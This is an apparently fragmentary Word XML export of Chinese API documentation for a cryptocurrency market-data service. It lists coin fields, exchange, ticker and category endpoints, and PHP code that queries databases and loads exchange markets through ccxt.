    <w:p w14:paraId="494590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address </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCBD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exchange.symbol_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043A4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exchange.score </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0B6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exchange.market_value </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>市值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC2B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E368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in_info()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A304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7E2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Coin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48858E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46C3C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605C1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F3F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urrency']=input('post.coin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747FB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coin')-&gt;where($where)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD5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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35B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latform_where['exchange']=['in', array_filter(explode(',', $db['exchange']))];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA3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exchange']=Db::name('platform')-&gt;where($platform_where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2607BA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icon'] = '/public/coin/icon/' . strtolower($db['currency']) . '@2x.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E44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follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3407D8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C043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follow'] = Db::name('member_coin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394DF4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gt; $this-&gt;memberId, 'coin_id' =&gt; $db['id']])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB12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CFAB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67DC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b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737E2A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A3D42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未找到虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2E34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A68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398F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exchange_timeframes </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回交易所时间框架</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0437FC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返回交易所时间框架</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D365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32DD6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3AE6A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053154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940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xchange_timeframes()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B00B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BDA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180EDE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0D6CBB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1F6424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D67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41495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36655B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698232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42CCF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xchange-&gt;timeframes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D369C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108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9DBC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ticker </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取指定交易对实时行情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6854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指定交易对实时行情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468B53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6A05E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FE2C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3B3364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ymbol    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB159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open  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开盘价</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B0A3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high  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时最高</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C17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ow  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时最低</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C29B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lose  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>收盘价</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC50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hange      24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DBE2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centage  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动百分比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E9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base_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内基准货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E817A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quote_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内报价货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085109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F0E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icker()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1DB1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1CD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1A5F8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5E04C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7751A1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A55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0ECEAD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input('post.symbol');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8AD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mbol']=$symbol;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E52B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Db::name('ticker')-&gt;where($where)-&gt;order('ticker_timestamp DESC')-&gt;limit(1)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26389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cker) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CDF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 ($ticker);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700F9D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171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C3ED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6DA2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kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取虚拟币分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF903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虚拟币分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550CD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67B684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00551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1D2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 </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45710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D5EC3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kind()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782B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C75B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ind=db('coin')-&gt;field('kind')-&gt;group('kind')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17113D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ray_values(array_filter(array_column($kind, 'kind'))));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5FA7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AEE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D97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arket/symbol_ticker </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取指定交易对实时行情列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468FB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指定交易对实时行情列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1210A9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243EA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286B2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Use MyPages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548919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quote     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>报价货币，必填，建议使用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>USDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA66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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，选填</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1CC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kind      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币分类，可选</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650CC9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实时行情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36988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urrency </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156625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ullname </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB95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icon </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C811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ullname_zh </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币中文全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505294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describe </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0FAC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introduction_zh </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中文简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734A7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release_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6DEE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release_price </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布价格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36504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white_paper </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>白皮书</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC39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block_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区块链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D94C2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official_website </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>官网</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEB39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ulation </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>流通量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F7B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total_circulation </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发行量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392FE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ollow_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加入自选数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E89E4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kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0CF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exchange </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA044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symbol      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7397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update_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间日期，格式毫秒时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5395D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last_price  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最新价格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A5F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open  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开盘价</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18908C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high  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时最高</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A8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low  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时最低</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0415CD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lose  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>收盘价</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B40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hange      24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A111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percentage  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动百分比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422FC5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base_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内基准货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAE4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quote_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内报价货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622B5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BC4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ymbol_ticker()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC7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ABC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aram.exchange');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521BA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ote = input('param.quote');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B02F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ind = input('param.kind');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C759A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_where=array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C2B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kind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48082B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_where['kind']=$kind;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C699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 = Db::name('coin')-&gt;where($coins_where)-&gt;order('market_value desc')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9537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ins['data'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497B5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未找到虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6ECD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 = array_column($coins['data'], 'currency');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C5B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_merge = function ($base) use ($quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A7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base/$quote";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532F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F8F4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array_map($symbol_merge, $arr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7B7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_query=Db::name('ticker')-&gt;field('batch_no')-&gt;order('ticker_timestamp desc')-&gt;limit(1)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAA8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exchange'] = $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FF8A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symbol'] = ['in', $symbol];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6C7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batch_no'] = $pre_query['batch_no'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B293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s=Db::name('ticker')-&gt;order('ticker_timestamp desc')-&gt;where($ticker_where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798B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icon=function($coin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EB8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icon']= config()['appConfig']['prod_url'].'/public/coin/icon/' . strtolower($coin['currency']) . '@2x.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E62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47D9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data']=array_map($attach_icon, $coins['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52708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ticker=function($coin) use ($tickers, $quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EBA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coin['currency'] . '/' .$quote;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F91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array_search($symbol, array_column($tickers, 'symbol'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5229A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alse===$ticker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24187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symbol'=&gt;$symbol, 'last_price'=&gt;0, 'change'=&gt;0, 'percentage'=&gt;0, 'base_volume'=&gt;0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D32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7C2E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tickers[$ticker]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADAA6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362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data']=array_map($attach_ticker, $coins['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56251C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oins);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA7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BB3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date_base()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F10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CF2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input('post.exchange')?:'binance,huobi,bitfinex,coinbase,kraken,bithumb,bitstamp,ftx,bitflyer';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15354C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arr=array_filter(explode(',',$id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CDD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_base=function($symbol) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4694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 = explode('/', $symbol);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBC58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r[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA5C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805F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_exchange=function($exchange){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D44D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platform')-&gt;where('exchange', $exchange)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A89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3463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platform')-&gt;insert(['name'=&gt;$exchange, 'exchange'=&gt;$exchange, 'kind'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77969E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68477A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3F2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update_exchange_timeframes=function($exchange){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263836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where('exchange', $exchange-&gt;id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55805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71D5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imeframes']=implode(',', array_keys($exchange-&gt;timeframes));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4B91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symbol_num']=count($exchange-&gt;symbols);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2B9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latform')-&gt;where('exchange', $exchange-&gt;id)-&gt;update($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761ED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02BF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3C6D94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EC2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ay_map($save_exchange, $exchange_arr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F755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exchange_arr as $ex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D42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18A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ex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736F00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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047FC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rkets = $exchange-&gt;load_markets();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CBFA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cies=array_unique(array_map($symbol_base, $exchange-&gt;symbols));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D667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exchange_timeframes($exchange);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1033B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urrencies as $currency){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A593E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urrency']=$currency;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBAF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coin')-&gt;where($where)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE0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86A3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exchange']=implode(',',array_unique(array_filter(explode(',',$db['exchange'].','.$ex))));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D11F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where)-&gt;update($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B1E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24A92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currency']=$currency;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D05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exchange']=$ex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BA8D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insert($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD6A3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3D4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16A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997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currency', 'btc')-&gt;update(['kind'=&gt;'DEFI']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22961E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currency', 'dfa')-&gt;update(['kind'=&gt;'DEFI']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74179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currency', 'eth')-&gt;update(['kind'=&gt;'NEF']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC2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currency', 'dat')-&gt;update(['kind'=&gt;'NEF']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDED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Done');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127736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625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date_ticker()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114A5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981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Market');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441660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296F8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3670A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6BE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post.exchange');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A71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_id = '\\ccxt\\' . $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC0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 = new $exchange_id (array (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28399A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nableRateLimit' =&gt; true,</w:t>
